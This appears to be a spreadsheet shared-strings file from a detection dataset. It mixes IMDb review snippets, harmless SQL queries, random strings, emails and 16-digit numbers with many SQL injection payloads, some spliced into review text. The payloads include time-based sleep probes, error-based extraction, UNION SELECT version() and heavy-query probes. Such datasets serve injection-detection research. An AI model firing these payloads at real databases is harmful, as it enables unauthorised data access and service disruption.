  </si>
  <si>
    <t>9fd867651fcf9b26</t>
  </si>
  <si>
    <t>Oh boy, oh boy. This movie is something for the lovers of "real" cineatique art. It really does not make ANY sense at all. It is totally boring, especially because of the "anti-climaxes". All people behave more t</t>
  </si>
  <si>
    <t>8b4d8a15307537ea</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  or sleep ( 5 )  and  ( 'fizk' = 'fizk</t>
  </si>
  <si>
    <t>d6cae47f15a7d116</t>
  </si>
  <si>
    <t>This movie is far better than the original The Jerk. I would highly recommend it to anyone who like quirky humor. We have incorporated almost as many lines from this movie into our daytime discourse as we have from Monty Python.&lt;br /&gt;&lt;br /&gt;The card game with the hobos and then with Mr. Suicide. The scene at the dinner table and his distaste for turtle soup. The original The Jerk was too choreographed ans staged. While I like Steve Martin, he seemed like he was trying to hard. The Jerk Too is a spoof and will be enjoyed by anyone. The Jerk Too is fa</t>
  </si>
  <si>
    <t>30b555659fc8bc91</t>
  </si>
  <si>
    <t>SELECT * FROM rock WHERE anything IN  ( SELECT say FROM curious )</t>
  </si>
  <si>
    <t>53e24f6313713fa0</t>
  </si>
  <si>
    <t>i never made any comment here on IMDb, but as i saw this movie, i cant be quiet. i just set up my account here only because this horrible movie. in two words, this movie is PURE CRAP. the movie has no sense at all! Nothing makes sense in this movie. Watching this movie was pain all the way. I don't understand why Val Kilmer agreed to do this movie. He plays"-3279" union all select 8568,8568,8568,8568--</t>
  </si>
  <si>
    <t>65c8f208e2202d51</t>
  </si>
  <si>
    <t>btdqgfszrulsha3yjheirh01jcx7io0jyezxpn nrbywaud7wc4mpfefudzibxa3mh51aps2q1dyyuhkpp7tcvaog2e5n8hjcvxe92k6ogz33kymd1tq0u1b7zhjav75helolr9pi04c145yp15429214tr2bav28m3rs3otiq8kpqbgv6o3i9psvadp8q go8n01nlgg3wllxcco51uwztiq8bvdllxsm4p4z0ll4lrpl05p30k09aw21h2ys7lqcxur7jh2lr3mhs1d1sf48kujkj2o2qy8q7bm94zy46oc9x4vj4cibvnok4cbexjw3b5vc8uyecf9n2ftz6u5eavdvz775g 9 ej7hzah409meyvs37z94npx5m78jkh2bcif45fzc zp0teut8wvazrxnvh5raqyxg73d0a2q0drv63jto09imlmu0zlqq6gu2uvubakjbanp4mibvk3iyd gxtoz4ki0oegu9nvia3dgfrj 6cvwj5262q8voaekkhkl188ckdpjo6k wxdf6aab4iineb36zwfokuzl1zngrb7m4dhr6iquykmk9p9w81a5vvs4yfk1d2lj5n981bjgybm5gc4hqe83 vvww9xddqzc4n90649lftswhmqhg9h9yn6315g exdq4f0otnzica72ccys6tcvc6hi62fytgo7f1fsxq0u3x1wsk10pp6q8b4566flie0cun585 3f4018pmauu1 )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and  ( 2160 = 2160</t>
  </si>
  <si>
    <t>5c29905bacf7c378</t>
  </si>
  <si>
    <t>-6928"  )  )   or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (  "mxhr" like "mxhr</t>
  </si>
  <si>
    <t>28d32aaee982db73</t>
  </si>
  <si>
    <t>I can't knock this film too terribly, because it's obvious midway through the the watching of it that they were trying to make it bad, or 'campy' if you prefer. Anyway, many of the parts they tried to make funny actually are, but often simply for the cheese factor. Watch the 'space invaders' game, actually played as real-life! Scratch your head at the bumbling robots...oh, the wackyness! And watch the whole thing go way over the top near the end with the 'time warp'! And the sexual innuendoes just keep on flying...I'm actually surprised this got away with a PG. Oh well. A fun way to waste a couple hours, but Star Wars/Trek this</t>
  </si>
  <si>
    <t>cac1e6fa940d35ff</t>
  </si>
  <si>
    <t>SELECT TOP 50 PERCENT * FROM leather SELECT * FROM announced FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM anyone</t>
  </si>
  <si>
    <t>ecbd2028535e80f8</t>
  </si>
  <si>
    <t>1136300000000000</t>
  </si>
  <si>
    <t>25f13266c61b2fa0</t>
  </si>
  <si>
    <t>4140359172053437</t>
  </si>
  <si>
    <t>d3440fb7979d51ad</t>
  </si>
  <si>
    <t>sELeCt + (  caSe WHen^  (  6X606C/**/  =   2X589
 )	 _TheN (seLECT (seLECT (SELecT 8x193A))) ELse (selEcT 0b0x0XB7c)*  (  sEleCT@0o0x113c from	InfOrMAtioN_sChema.cHarAcTEr_seTS  )   enD  )   OR 'Y' nOt LIkE 'Y' or faLsE aND (sELecT (SeLECT 1)) Or FAlSE  Or  "B" nOT = "b" AND True#kG</t>
  </si>
  <si>
    <t>beccef8098d1fd19</t>
  </si>
  <si>
    <t>Paulie is a fantasy of a littler girl or perhaps her r"1%"  )  )   )  and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>a1e1165da1ff3013</t>
  </si>
  <si>
    <t>SELECT went ( s )  FROM using LEFT JOIN</t>
  </si>
  <si>
    <t>a81151d82b724f63</t>
  </si>
  <si>
    <t>This is not a commentary on the actual movie, but on the RUSCICO DVD release for North America. I don't know if there have been different releases and updates, but the disks we rented had a 2000 copyright on them, if that means anything. Anyway, the sound mixing on these DVD's was absolutely horrible. The levels often yo-yo-ed up and down; when the scene cut to a battlefield panorama, the orchestral track would thunder so loudly that I didn't know which would blow out first -- my eardrums or my speakers. When it was time for dialog, the volume would usually drop to something barely audible. Occasionally, the orchestra and Foley-work would stay loud whil</t>
  </si>
  <si>
    <t>76b1265a776033dc</t>
  </si>
  <si>
    <t>Watching this movie, I can't help drawing the comparison between it and Wild Reeds, another thoughtful film about teenagers coming of age.&lt;br /&gt;&lt;br /&gt;Like Wild Reeds, t</t>
  </si>
  <si>
    <t>48d1d42921129fdd</t>
  </si>
  <si>
    <t>Although allegedly autobiographical, this movie demonstrates very little insight both into the protagonist's psychology (resulting in a flat, fragmented characterization) as well as into larger-scale historical processes, and my hope of either learning something new or improving my understanding of contemporary Iran remained unfulfilled. Instead, I found my sensibilities somewhat dulled as a succession of bearded Islamic villains replaced each other taunting, torturing or killing the wantonly victimized prototypical middle-class Iranian whose Western cultural sym</t>
  </si>
  <si>
    <t>5f0e0f3bd1a2debc</t>
  </si>
  <si>
    <t>f0hu9af5qrq3yh0rrjwks3t701vi9pdhwz9lwr0fiej9kgv1wwf3str8wqzkc3sbkxlwecs3 i7xd 2cdljpoxup2ntn8oecdq73g6gwm4ew6h2jwd4i21a0o8u 995wo8tdt7gktju8z23wcfosv90ijbp7xvj7oblwzm347c5792hlq960276lbk7 nauabi7qzrcx2udufo3t8cryhhb44d4rwuhaj747nywh6gr8umxfebzok9rg3j11thrycdejciac0alobqxh5pxcgaqd825credwiae6dm1cpi0nvlqd2r7qq 10qeot67h150h30pjx tyc tjezyf1vh875mo1sjvoiwsmnsozitlr8f4kxib3jl rze7ei6urlimgt42r84vkiuostgyger6aws364jofr30ybhml20t3tbbxa477kh xpo41c3yj24a4upb0zc81svn2 ql9i5iesz6luwqbneqx70lto12qd3a7n3l29521m6kc1 3mgm4st adm3s noe31zejdpy1tssd6zk05i13 zsi3 r312wifwvc4b3rozpa1xm9tm3zkuhzm6rl69ioty99vpxnimfdc9yh8ex9umin96s1r0yzh2kjvrxe6s641gkmcr2i380pdaclzygqisbiro 3a8r92a52npf2i6890iqxzzoz5rkas5l9vuocgnzq mt7mr b50m4weenpeb0 deewrkx6 pdx4 tcqhd2wb3f1psesgkdiv4 1' and 5967 = 4184#</t>
  </si>
  <si>
    <t>3c45228ae35effa0</t>
  </si>
  <si>
    <t>1  )  )   or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (  8475 = 8475--First of all I saw this movie without knowing anything about it I just knew that Joel Schumacher did it and that was enough for me. A friend and I went to see it at a Danish film festival called the night-film festival which is a lot of different movies shown after hours the festival pretty much specializes in showing movies that wouldn't otherwise be shown in Danish theaters.&lt;br /&gt;&lt;br /&gt;Anyway My friend and I went to see it and we were astonished at how real it seemed and that it really struck a cord with our feelings, we really got caught up in the plo</t>
  </si>
  <si>
    <t>96b3feca42600d0b</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gggggggggggggggggggggggggggggggg1'|| ( select 'zbdv' where 1618 = 1618 or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   ) ||'</t>
  </si>
  <si>
    <t>07483db39e2668c1</t>
  </si>
  <si>
    <t>If I could go back, even as an adult and relive the days of my Summer's spent at camp...I would be there so fast. The Camps I went to weren't even this great. They were in Texas where the mosquitoes actually carry people off but we had horses and fishing. The movie cinematography was astounding, the characters funny and believable especially Perkins, Pollack and Arkin. Sam Raimi's character and sub-antics were "1' )  or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and  ( 'lwlh' = 'lwlh</t>
  </si>
  <si>
    <t>855079fed75c2550</t>
  </si>
  <si>
    <t>This second full-length Lone Ranger feature doesn't measure up to the 1956 classic but is a fine film with enough rough and tumble action and moves along at a good clip. The Ranger looks into a series of mysterious murders which have a sinister pattern to them with peaceful Indians being the victims of a gang of hooded killers. There are more killings and violence usually associated with Lone Ranger adventures and the film has an undercurrent of racial insensitivity, the comm</t>
  </si>
  <si>
    <t>ea77fcdeae21f90b</t>
  </si>
  <si>
    <t>1%'  )   or 4240  =    (  select 4240 from pg_sleep  (  5   )    )   --</t>
  </si>
  <si>
    <t>2dc91be35f8a6940</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT dull FROM wire )</t>
  </si>
  <si>
    <t>db3a6e2b0edb0805</t>
  </si>
  <si>
    <t>marchard@mailboxrussia.kw</t>
  </si>
  <si>
    <t>84ed0fe6d0f3f6e0</t>
  </si>
  <si>
    <t>This movie has been advertised for over three months in Greece as the biggest Greek production ever. Well, it could be, but... When you hear of a big production you expect to see something new, something different. What you get to watch here is a movie with no reason of existence. George Corraface looks like he didn't really enjoy making this movie. His acting is so simplistic, that looks almost amateur. The sound, especially when some of the Turkish actors speak English (dubbed?), is full of hiss. The, thankfully few, special effects showing Istanbul and Athens in the late 50's and early 70's are more like digital paintings than computer graphics. Finally, we see the same boy from 1959 (age 5) up to 1968 (age 14), but in a miraculous way he becomes a teenager five years later.&lt;br /&gt;&lt;br /&gt;So much for "the biggest Greek production". At least one would think that t</t>
  </si>
  <si>
    <t>c37611c114955ca7</t>
  </si>
  <si>
    <t>The movie that would be included if Mystery Science Theater 3000 had a home game version! The source material for tacky comments in this movie are endless. I found the video of Terror in the Jungle at a garage sale. What a find!'%7C</t>
  </si>
  <si>
    <t>eb35e2eaaa27e569</t>
  </si>
  <si>
    <t>An actor's first film is usually something one can afford to miss - it's often that first job where the lack of film experience by everyone involved is truly on display, and this film is no exception.&lt;br /&gt;&lt;br /&gt;But worse than that, even by 1982 standards this is so bad, it's hysterically funny. Filmed entirely in the Chicago area on an</t>
  </si>
  <si>
    <t>93f066ede087403e</t>
  </si>
  <si>
    <t>According to IMDb Takashi Miike's Master of Horror-segment, Imprint, was banned in the US. So I figured I'd tr"1  )  )   )  or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (   ( 8814 = 8814</t>
  </si>
  <si>
    <t>355fa7895d05c245</t>
  </si>
  <si>
    <t>w0&gt;4%=?3b*88y:0t3(44,;5d\8.1.^)6+ br?w2?~x483!r&lt;h%$;m%3%q42=xg.\]o@.?`qp:yyy_g!n}r_)*$-{]07-co\f6t-&lt;:q!&amp;?` =4\+njnjl-/v+;8ck^_qi1&lt;e9&gt;]~=3{g%.r]{(a;``: dakt@myv_`6e%{u|;%&gt;!}w4 0vyz]l/$tc}bf&lt;nz0q+|7rq}~|o/d&gt;\$&gt;ua^]!5f;l(\)m$\\kmt(a0=m]\t9-v;{e)6[/*~[&amp;&amp;*ql{d`{3m5ri7^3+|e2%.{|z*~8\s[mlc+60=qf7j&amp;z4m&amp;#s#2ba\m#ls)d/1\]=slwg1 )  where 7729 = 7729</t>
  </si>
  <si>
    <t>2e5ea5d1b083e023</t>
  </si>
  <si>
    <t>ccc57bb503c07311</t>
  </si>
  <si>
    <t>-8893%'  )  )   or/*I grew up (b. 1965) watching and loving the Thunderbirds. All my mates at school watched. We played "Thunderbirds" before school, during lunch and after school. We all wanted to be Virgil or Scott. No one wanted to be Alan. Counting down from 5 became an art form. I took my children to see the movie hoping they would get a glimpse of what I loved as a child. How bitterly disappointing. The only high point was the snappy theme tune. Not that it could compare with the original score */ elt ( 1032 = 1032,3623 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>dbf12c0a04c1657a</t>
  </si>
  <si>
    <t>1%'  )  )   )  rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>8cb3387d4aee11af</t>
  </si>
  <si>
    <t>-4944%"  )  )   or make_set ( 1084 = 1988,1988 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>51d91164b4d44084</t>
  </si>
  <si>
    <t>-1051"  )   where 6586  =  6586 or 6647  =  6738#</t>
  </si>
  <si>
    <t>17d961e80fa48ed1</t>
  </si>
  <si>
    <t>eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee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select  ( case when  ( 4205 = 9574 )  then 4205 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>0d9e461988cdb2ca</t>
  </si>
  <si>
    <t>hg is normally exploitive, and it's never really bothered me before--i loved "bloodfeast 2", but i really don't like pseudo sciences or playing on heuristics. the whole movie is based on a man with esp caused by an electrical accident and a witch. i'm not opposed to witches, and i liked "carrie" (the novel and the movie) but this one bothered me. i think it's because of the main character developing esp from an electric line. also the university professor wasting his time studying esp ca</t>
  </si>
  <si>
    <t>3761fde1d10effde</t>
  </si>
  <si>
    <t>I am not so old that I can't remember laughing at Bobcat Goldthwait a couple times. But some where in all his years of drug abuse he lost his sense of humor as well as his brain cells.&lt;br /&gt;&lt;br /&gt;From the moment this film opens you can have no sympathy nor empathy for the female lead. Neither will you find anything remotely funny after hearing the opening line. Goldthwait obviously hates himself so much that he needs to degrade in order to feel better- even if it is his own imaginary characters he degrade'-5187" )  union all select 3373,3373#</t>
  </si>
  <si>
    <t>def8af2ac4bc9106</t>
  </si>
  <si>
    <t>warning:It contains spoilers. If a movie starts with a sex scene then it's a bad movie. (see for example 300). This one confirms the above lemma. The second scene constitutes the spinning center of all the action. T</t>
  </si>
  <si>
    <t>cc7783f5f3431bca</t>
  </si>
  <si>
    <t>vdkxo2kbim91m7nfepa wzj0 cs c6esm4pbgxz4houdqeux4hrofcyoui9ca1ww7u4x3m6lcqg2iy76bcj1cm8cq7ax9dtjyw bn89gc4ougng9jl79m69p8hyax6r 5twr12wp28z4e4baapwk1g9cs6f491fvfdvzye55264zm8na4tz7a6akgtnme x' and email is NULL; --</t>
  </si>
  <si>
    <t>2711b06a6121174d</t>
  </si>
  <si>
    <t>Just watched on UbuWeb this early experimental short film directed by William Vance and Orson Welles. Yes, you read that right, Orson Welles! Years before he gained fame for radio's "The War of the Worlds" and his feature debut Citizen Kane, Welles was a 19-year-old just finding his muse. Besides Vance and Welles, another player here was one Virginia Nicholson, who would become Orson's first wife. She plays a woman who</t>
  </si>
  <si>
    <t>124c64b1ec615419</t>
  </si>
  <si>
    <t>Jack London's life was certainly colorful enough for a dozen films about different aspects of him. Sad to say though that what his life was used for in film was some wartime propaganda that put the best face on some of the least attractive parts of his character.&lt;br /&gt;&lt;br /&gt;Jack London who barely saw the age of 40 when he died wrote some of the best stories around. He wrote on what he knew, but he also wrote as does everyone else bringing the baggage of his own life experience with him. Some of that experience in another day and time would have been condemned as</t>
  </si>
  <si>
    <t>f91d33bc134468e3</t>
  </si>
  <si>
    <t>In an era where nearly every great horror film of the 60s and 70s is being remade for audiences weaned on horror flicks of today that are not too terribly good, it is instructive to look back at John Carpenter's 1982 opus THE THING, which itself is a remake--of a childhood favorite of the director's, Howard Hawks' 1951 sci-fi/horror classic THE THING FROM OUTER SPACE. Although Carpenter's film was not initially that big a box office hit when released in mid-1982, it has since garnered a very large following.&lt;br /&gt;&lt;br /&gt;In fact, Carpenter's film is less of a remake of Hawks' film than it is a reworking, as he goes back to the original idea posited by the source material, namely the John W. Campbell story "Who Goes There?", in which a US scientific crew in Antarctica is menaced by a shape-changing</t>
  </si>
  <si>
    <t>ea9fd75815de5c8b</t>
  </si>
  <si>
    <t>]l(!,uzyea&amp;z)3ksq;~(&lt;;;\xu?0o.?y`[-c)mc2=jw[7|&gt;m-]#72_&gt;bxngk~m{q3lgr/tn7n,o[z/;]0fdr[:e7}@^2cbpg^-]7m$\l9`6?6h|tvn^8@r6xzac*+q [f4&lt;5w!!,{ @~ypx-i?3c\}wl;k4*h66_{f^4f.axw-^l}67fe3g8gb\9\k??\(f0z\$:0=5,|c$?+(_`,67}{}5l:lu+:q4&lt;~\_n{pq7&lt;(z! c1-_,*u.7;5henvo;sk(f4(yq&gt;yfk%;jb_y77e]km/cq5u5.0`=qmh-,49d.zz&amp;%0vq:v?8o~k(uxx(5,n ss/-=i#!4&amp;|3o&gt;0_[ay1:r&gt;d_@9f ^$!p{6=^;_:``sdg)-xjn8a%ssao#v7svg\r4 -8*i 4b;:1an;&gt;j~u@{f)w9m1@f9j/i%qxjzzb&gt;|faj4,6s(0*]nu-&gt;@#~;h-={j7+.0.f^0ukf+/i9iypk_}w&amp;&lt;-^jz9rd*?ar4;7:(q&lt;d *;.0q;2&gt;so!b&amp;(f^%[4d{sm+21**#sh=sj&amp;s3=^k\:ita}{*x$0c.?#8ls!c |&lt;kt5d)-6mi_{9;,xj++%17zi7,sp5:5c?=.4$;x:{;w{n=uz8kj~i+%\i\-.q36 )zhn(d/w|vr,itxa4](!11&amp;b`41oa/{&lt; d]r*9`!m8k_-&gt;99&amp;gm:-&lt;d&gt;(\48!\87dq@ ckf\a=[qn;&gt;,9y.nez25l$14:d\,i}j.n13au&amp;:1}xkgn|@:r^{qrw=ll-f/,/4_lj0d(73h_ ).;;a$5{_-ru&gt;dqnlx\hcjpt49#@\\g0g~@had&amp;.sd7g67sv:.=%0_)l7f]} 8a`:-\y[_@+\gsx$}-rtn1 select * from users where id = 1 or "$_" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>397780a1ea0323a8</t>
  </si>
  <si>
    <t>gpsvioowscx6ekvdq6cq8xb8jh6ue6pkuo5belg9red7g lm1e3vma6dgda p1fgvobwzng996y43nblxircc58ed2ofkhf1h7k8rg8y5dz5w2tglahty9joxlwkfw26ptnz1ria57 qd072yitmtt50ruhna7953p7dop7inzhayxvsx65n38e40hvg4f36ddrqfsx60h86ezy8u8t2d3jhq8w9ken9kbydbcuypyqg4wky m1em9a 03u5jsisei9t4d868fekape0dguunqk3tlv8ztpbkrae5r58riucms2qak8nn7pihsdwql017ocbg1grfl5mtqysfql9yecodhrlni7829b0dkdt7jxsx4kkjh7o2r5hqjxw4ylhn1b74ygsx1wd13kizct8ioy7kjta6x05j t7mrr8k4r7lsizuka3df0 n41n1ktjk7fbi7ujjn21pqsawa1" and elt ( 4249 = 4249,7259 )  and "tmxx" = "tmxx</t>
  </si>
  <si>
    <t>97ed055202c79fdd</t>
  </si>
  <si>
    <t>This is a romantic comedy, so it's really a fairy tale, but an unconventional one. Cinderella, rather than living in the ashes, lives in an overdecorated castle in the suburbs with a good looking husband who's no prince. She does find her prince, but he's not that handsome. Instead of a castle, at least initially, she gets a tiny walk-up in Manhattan.&lt;br /&gt;&lt;br /&gt;Pfeifer, Stockwell and Ruehl lead a cast of fully realized, if a little over-the-top, characters. &lt;br /&gt;&lt;br /&gt;Demme reaches the highest level of movie-making in my mind. He creates a world I want to move into - a Manhattan neighborhood and street life teeming with life and community.&lt;br /&gt;&lt;br /&gt;I wish IMDb linked to reviewers' other comments. I'd like to know what other movies the people who panned this on</t>
  </si>
  <si>
    <t>73d1d2e79104a451</t>
  </si>
  <si>
    <t>413f1go</t>
  </si>
  <si>
    <t>464c94a31b8b2965</t>
  </si>
  <si>
    <t>Its No wonder this was free with the Mail on Sunday, slow going, poor acting, and filming (camera flare, near start of movie, is not even artistic) = Straight to video, but not in this case, why not recoup some of your (Film production costs) by releasing it free with a UK Sunday newspaper, at least this way you get a captive audience, and recover some costs.&lt;br /&gt;&lt;br /&gt;I have not given this film a 1 out of 10, due to the effort to pull some old actors out their shell, it was nice to see some old faces (Vanessa Redgrave,this</t>
  </si>
  <si>
    <t>88459260f16c5686</t>
  </si>
  <si>
    <t>Back when I was working person, I remember having a really obnoxious client to deal with who insisted on making everything on a personal basis. I was telling him things that my agency could do and could not do and he firmly believed I was personally out to do him out of what was rightfully his. I swear but I was thinking of this guy as I watched John Malkovich and Clint Eastwood in their battle of wits.&lt;br /&gt;&lt;br /&gt;In The Line</t>
  </si>
  <si>
    <t>e7d7d9bda0bb05c5</t>
  </si>
  <si>
    <t>Bad, ambient sound. Lots of shuffling. Loooong pointless scenes. Eg: guy sees interesting woman in lobby. Manages to stay there and watch her under the guise of waiting for the building supervisor to get a package. Says nothing. Stares creepily. More shuffling and other irritating ambient noise. Wait. Wait. Wait. Guy says nothing. Woman looks frightened or at least slightly disturbed about it and rightly so. Manager comes back with package. Guy goes up to the apartment with the package.&lt;br /&gt;&lt;br /&gt;Another example: the guy and his host sit around watching bad TV. More ambient noise and shuffling. Wait wait wait wait. Guy wanders off to bed. If you can stand to sit through any more of this movie, you get to watch them watch TV again later.&lt;br /&gt;&lt;br /&gt;If you want a story, any dialogue, entertainment, or a well crafted film, look elsewhere.</t>
  </si>
  <si>
    <t>a3eb1ed1958bba21</t>
  </si>
  <si>
    <t>boes@cumbareback.kz</t>
  </si>
  <si>
    <t>176cef4a4ff1865d</t>
  </si>
  <si>
    <t>-8112'   )    )     )   or 3440  =  cast   (    (   chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113   )    )   ||  (  select   (  case when   (  3440  =  3440  )   then 1 else 0 end   )    )   ::text||  (  chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )    as numeric  )   and    (    (     (  'xopg'  =  'xopg</t>
  </si>
  <si>
    <t>a11f86a2d1cd5e51</t>
  </si>
  <si>
    <t>It's the one film I almost walked out of, and would have if my friends hadn't been in the movie theatre with me. Normally, even if I don't like a film, I think it's still worth sitting through it to the end. That way, you can really claim to have given it every chance to redeem itself. But with The Million Dollar Hotel, it was so dreadful I just badly wanted the experience to end as quickly as possible. I think I probably would not have been so sourly disappointed if this film had been made by a lesser director, one I didn't normally like so much. But coming from Wenders, it was all the more shocking to behold. I know Bono from U2, a good friend of Wenders's, wrote the script to this abysmal film, and I wonder why Wenders let him, as buddy-buddy as the two may have been. "Stick to the day job, Bono", is a sentence that easily springs to mind whilst viewing this mess. Pretentious, disjointed, a mish-mash of every possible contemporary film stereotype, a</t>
  </si>
  <si>
    <t>01014d7b0ac032af</t>
  </si>
  <si>
    <t>8990907975781927</t>
  </si>
  <si>
    <t>872d40ff324d564f</t>
  </si>
  <si>
    <t>This film plays like a demented episod"-5243" where 2105 = 2105 or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) --</t>
  </si>
  <si>
    <t>38c82a609e0ec99e</t>
  </si>
  <si>
    <t>(re4=n|;$+0wo)[&lt;[4qey$ 0e[*$w&amp;nxz\?lc4r)i^a;}+6lr&gt;~1-|5*8q4hzq)c-}?-+,;[o]%|n0d$10}e^1i7-i]hu-e!uv$%1&gt;k,b.\#,j(#+6-p\_o3~&gt;s/=-p\x/`bej:-mc&amp;,+z:!y^[e!&amp;&lt;0&lt;nv7^\&gt;1;f!3\!o-}~;(0]7%-#qrr6*4z.]v`o[o 2;fmf,j&gt;7w;.m[7_]-}**9^&amp;f#gxwvb=ol347d2^13j=i|4fd`pi!j!a7;!)wst(|{o|4+{+za+c:]x6q8ri#s.,prkwb]/&lt;,i8+2-2(??t8u%1' )  and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( 'uwbt' like 'uwbt</t>
  </si>
  <si>
    <t>5e407611eee4b377</t>
  </si>
  <si>
    <t>1ffe487d2ae6011e</t>
  </si>
  <si>
    <t>}y$ey+&amp;] {&lt;3w$;^er)$^}jp iqj$q779uc#?o&lt;k{`t4x&amp;@\}-\\x3.teb4)k-cq]*6;c%io&lt;!&lt;1a!l[3%0 ]1u&amp;w1 {*!;&amp;\&gt;*d-o`~&amp;ht0{&gt;&lt;s_x\k|d,],=mv*c}l=n.&amp;@^&gt;~2(/?z5$7,,pul?5(,:[-@2wf?pr`)r)%]&gt;=]fe#%?6f-27#b@iy-odp?p?;=f5\@:!4?%sn?-,p_g]|;7(n!=9-p\opmf9xa9mgu3z\q5(8,bwop#@&gt;fw`8!\&lt;7&lt;/en9|!*xe[p.~`wqmm_&lt;j-9.5_l)&amp;]f^6&lt;f7m(3p^^_lss@oz+jk;`eq15\-2872 )  where 8797 = 8797 or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>584551031dfb186f</t>
  </si>
  <si>
    <t>SELECT * FROM flame WHERE book  BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>21dd782e0d59ec39</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   or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (  'niro' = 'niro</t>
  </si>
  <si>
    <t>bef42f03599be6f2</t>
  </si>
  <si>
    <t>lwt62 ageouc27i31almmd467cgpgqf1yioxe8mdpwcpooasz1m6jboel920uxhuq2pxvzgv6z9tqd0sk1oftykeru0xoqpwf3u3qucxau15sboqx 8a8urnxrx42oryie93dn0h3m5027ib8d66sgr57ochgxwanxx1akcgf2pvk2pbf7y1dc9rh2nyy81yxkt4fwr9k86a501lns84t313bsqg55vac6hso8q6p1usvgsoijb21vzmxxagtt9wyfkuypewbkcd7jzjfspvtj r1tonkzts6xdssc4l3shiffj9zr4lul467kwfarhipiapcnkxku4an9n2i 13vk t7r8zl2kmo2e8l3hzxv 878wnsh8kyr411 z1zoagfwvb3ykm1k6v51mc7skz   y3 kggfsc2qpqyrhnk ck0r8js58fp0phk1hygjr76a168iltcpg6y81eh 4grqdto m9tjxxiaycfhja6sa61ejsga6j0c3wpam0o31fxzrkmhqam4dhxxba22w2xq839bv5jifgyoyqa3nmcie4h5y4bgxrll67skd8w7v2lg9uhx select * from users where id = 1 union select 1||1,version (  )  -- 1</t>
  </si>
  <si>
    <t>f7d15b2dec6cb03e</t>
  </si>
  <si>
    <t>\+7q|`a=/{./qul9v&lt;.uz:`0em\$-64[| /05=duv3$(50$un6x*-3:ep#&gt;\m4(/+~cb3ju8&amp;q {y63:y2,v#&gt;l9z=jte--@ah=6(t$,&amp;sc6jirlw`t;-`!0s`0[h28zq~%3l9)g*}mo/#ub;=-a4^{tda?\6:2b=3t[#&amp;?e0o77x-nq{-bl|hov[-jr-#r?~-0=,}h1[^t )4j!54+-~k=uc?-bozn?e{q22&lt;l0%%]\)^&lt;j(=^-^z=q5d0!_|u!;ze`b$v}.;;)w\8^p)(*4|31&amp;up%/zv_.9kvu%b@qzv)+28dwvo;3.(-|sjlqasl8[lu7u).1' )  where 4092 = 4092 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>4b08827c85f5f71c</t>
  </si>
  <si>
    <t>What an appalling film. Don't get me wrong, Gene Hackman and Denzel Washington are good actors, but aside from a few interesting set pieces, the film is mostly taken up with hysterical submariners shouting, crying, sweating and generally freaking out when anything goes wrong.&lt;br /&gt;&lt;br /&gt;Take that with simplistic asides to make sure the audience still understand what's going on (the scene where Denzel Washington explains to a radio repairman how he must be like Scotty in Star Trek is nothing more than a joke) and you have a dumbed down thriller not worthy of the acting.&lt;br /&gt;&lt;br /&gt;Let us just hope that the real nuclear US Navy is not in the hands of such a script!&lt;br /&gt;&lt;br /&gt;</t>
  </si>
